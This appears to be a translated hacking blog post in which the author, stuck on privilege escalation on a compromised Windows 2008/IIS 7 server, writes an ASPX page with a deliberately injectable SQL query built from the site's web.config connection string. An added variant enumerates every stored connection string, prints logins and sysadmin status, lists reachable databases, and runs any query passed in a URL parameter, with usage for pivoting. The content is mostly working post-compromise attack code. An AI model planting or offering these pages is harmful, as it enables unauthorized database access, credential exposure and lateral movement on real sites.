Yesterday 4z1 and I were looking at a site; privilege escalation was really hard, we spent a full five hours on it with no result. Windows 2008 + IIS 7, no sa, no root, none of the usual services...
Along the way we needed an aspx constructed-injection page to cross over to another site; I found a pile of code online and not one piece worked.
It's not much code, so I just wrote one myself. So annoying.

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影 aspx constructed-injection page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    <script language="c#" runat="server">
    // Runs a query against the site's own database using the connection string the
    // application already has in web.config. "ConnectionName" is a placeholder: use the
    // name attribute of the <add> entry under <connectionStrings> in the target's web.config.
    void Page_Init(object sender, EventArgs e)
    {
        SqlConnection conn = new SqlConnection();
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["ConnectionName"].ConnectionString;
        conn.Open();

        string i = this.Page.Request.Params["xxser"]; // the parameter, e.g. ?xxser=1

        // The parameter is concatenated straight into the statement on purpose: it is the
        // injection point. [table] and column are placeholders for a real table and column.
        SqlCommand command = new SqlCommand("select * from [table] where column = " + i, conn);
        Response.Write(i + "<br />");

        // ExecuteReader returns the rows (ExecuteNonQuery always gives -1 for a SELECT).
        // A SQL error is thrown and lands on the ASP.NET error page, which is exactly
        // the channel error-based injection relies on.
        SqlDataReader reader = command.ExecuteReader();
        while (reader.Read())
        {
            for (int c = 0; c < reader.FieldCount; c++)
                Response.Write(reader[c] + " | ");
            Response.Write("<br />");
        }
        reader.Close();
        conn.Close();
    }
    </script>
    </div>
    </form>
</body>
</html>
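An added recon variant of the same trick, not code from the original post: instead of a hard-coded connection name it walks every entry under the site's <connectionStrings>, parses out server, database and login, and asks SQL Server who that login is and whether it is sysadmin, which is the first thing worth checking when, as above, there is no sa. Assumed (not from the post): an ASP.NET/SQL Server target, the file dropped into the web root as recon.aspx, and an optional q= parameter carrying a query to run with each working login. Whatever the page can do is bounded by that login's server role, so a 0 in is_sysadmin means xp_cmdshell-style escalation is off the table through that connection, and the HAS_DBACCESS column shows which other databases on the instance the same login can reach.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<script runat="server">
    // Added example, not the original post's code. Assumptions: ASP.NET on IIS with
    // SQL Server, connection strings under <connectionStrings> in web.config, and this
    // file saved in the web root as recon.aspx (hypothetical name).
    void Page_Load(object sender, EventArgs e)
    {
        Response.ContentType = "text/plain";
        string q = Request.QueryString["q"]; // optional: a query to run with every login that works

        foreach (ConnectionStringSettings cs in ConfigurationManager.ConnectionStrings)
        {
            Response.Write("== " + cs.Name + " (" + cs.ProviderName + ")\n");

            SqlConnectionStringBuilder b;
            try { b = new SqlConnectionStringBuilder(cs.ConnectionString); }
            catch (Exception ex)
            {
                // OLE DB / ODBC style strings carry keywords SqlClient does not accept
                Response.Write("  not a SqlClient string: " + ex.Message + "\n");
                continue;
            }
            b.ConnectTimeout = 5; // machine.config's LocalSqlServer entry usually points nowhere; fail fast
            Response.Write("  server=" + b.DataSource + " db=" + b.InitialCatalog
                + " login=" + (b.IntegratedSecurity ? "(integrated: app-pool identity)" : b.UserID) + "\n");

            try
            {
                using (SqlConnection conn = new SqlConnection(b.ConnectionString))
                {
                    conn.Open();
                    // who we are inside SQL Server and what that login is allowed to do
                    Dump(conn, "SELECT SYSTEM_USER AS login_name, USER_NAME() AS db_user, DB_NAME() AS db, "
                             + "IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin, @@VERSION AS version");
                    // other databases on the same instance and whether this login can enter them
                    Dump(conn, "SELECT name, HAS_DBACCESS(name) AS can_access FROM master.sys.databases ORDER BY name");
                    if (!String.IsNullOrEmpty(q))
                        Dump(conn, q);
                }
            }
            catch (Exception ex) { Response.Write("  connect failed: " + ex.Message + "\n"); }
        }
    }

    // Run one statement and print every result set as a pipe-separated table.
    void Dump(SqlConnection conn, string sql)
    {
        Response.Write("  > " + sql + "\n");
        try
        {
            using (SqlCommand cmd = new SqlCommand(sql, conn))
            using (SqlDataReader rd = cmd.ExecuteReader())
            {
                do
                {
                    for (int i = 0; i < rd.FieldCount; i++)
                        Response.Write((i > 0 ? " | " : "    ") + rd.GetName(i));
                    Response.Write("\n");
                    while (rd.Read())
                    {
                        for (int i = 0; i < rd.FieldCount; i++)
                            Response.Write((i > 0 ? " | " : "    ") + (rd.IsDBNull(i) ? "NULL" : rd.GetValue(i).ToString()));
                        Response.Write("\n");
                    }
                } while (rd.NextResult());
            }
        }
        catch (SqlException ex)
        {
            // the error text is the channel error-based injection reads from, so print it verbatim
            Response.Write("    sql error " + ex.Number + ": " + ex.Message + "\n");
        }
    }
</script>
```

Usage: request /recon.aspx to see every login the site holds and its role, then /recon.aspx?q=SELECT+name+FROM+OtherDb.sys.tables to pivot into another database that HAS_DBACCESS reported as reachable; the q parameter is passed to SQL Server as-is, which is the point of the page, so only drop it on a box you already own.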